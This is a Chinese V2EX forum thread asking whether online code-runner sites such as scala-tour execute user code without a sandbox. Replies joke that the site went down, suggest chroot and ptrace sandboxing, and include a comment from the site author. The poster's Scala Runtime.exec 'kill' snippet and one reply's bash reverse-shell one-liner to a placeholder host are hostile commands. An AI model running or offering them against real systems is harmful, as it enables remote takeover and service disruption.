网站在线运行代码

2015-06-04 22:58:19 +08:00
 hellomsg

http://zh.scala-tour.com/ 这样的网站,他们的代码直接在服务器上运行然后返还结果吗?还是在什么沙箱或虚拟机里运行。

如果在服务器上运行,是不是我在他的代码框里执行以下代码就可以把它的进程给杀了。。。
val rt:Runtime = Runtime.getRuntime();
val p:Process = rt.exec("kill n");

11998 次点击
所在节点    Java
108 条回复
Syaoran
2015-06-05 12:59:55 +08:00
这就404了,如果站长没备份怎么办……
hellov22ex
2015-06-05 13:00:57 +08:00
玩大了,已经404了
liujiantao
2015-06-05 13:09:13 +08:00
这也是得怪作者不加以限制,kill可以执行,rm都可以。。。
lazycat
2015-06-05 13:12:57 +08:00
卧槽这个有点厉害。。。笑死我了哈哈哈哈
momou
2015-06-05 13:26:14 +08:00
赔我午饭!!!
lrqrun
2015-06-05 13:27:34 +08:00
哈哈,作者要找你拼命了
chinabrowser
2015-06-05 13:32:02 +08:00
陪我早餐Σ(っ °Д °;)っ
qihboy
2015-06-05 13:37:31 +08:00
23333333333....
tzwm
2015-06-05 13:47:54 +08:00
@qsz13 刚想进去玩玩,你就先给玩坏了……-_-!
LedChang
2015-06-05 13:59:16 +08:00
@qsz13 = =!
RIcter
2015-06-05 14:00:57 +08:00
来,给你们几个 payload:

反弹 shell 到 xxxx.com 的 8888 端口:
bash -i >& /dev/tcp/xxxx.com/8888 0>&1
hellomsg
2015-06-05 14:56:38 +08:00
@jsq2627 不是缓存。我手机联通的,估计有两个或更多容器在跑,电信一个、联通一个。。。。猜的
duteng612
2015-06-05 15:17:46 +08:00
使用chroot(http://www.tutorialspoint.com/unix_system_calls/chroot.html),修改root dictionary;这一步骤可以保证你的服务器安全;然后再当前目录下配置运行环境(解释型和编译型的语言有些差异),不同语言也需要做一些不同的处理,之后使用ptrace跟踪运行程序;
KayYan
2015-06-05 15:52:31 +08:00
@hellomsg 我才是真正的作者。
当初做的时候,考虑这个问题。觉得坑很大,就决定不自己处理,让Heroku帮我搞。现在看样子Heroku也靠不住。挑个吉时上DaoCloud吧。
giuem
2015-06-05 15:57:43 +08:00
@KayYan 23333
hellomsg
2015-06-05 16:52:57 +08:00
@KayYan
@giuem
看名字确实是你。
@qsz13 快来快来,当事人来了
hellomsg
2015-06-05 17:46:16 +08:00
@KayYan 你应该是部署了好几个吧?我的手机还可以访问,电脑端访问不了了
KayYan
2015-06-05 17:49:54 +08:00
@hellomsg 我重启过了。电脑访问不了了可能是因为网络的原因(翻墙可能访问不了)。
Mrxx
2015-06-05 17:58:25 +08:00
"框里尝试一下" 不能更清晰
asj
2015-06-05 18:25:48 +08:00

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/196195

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX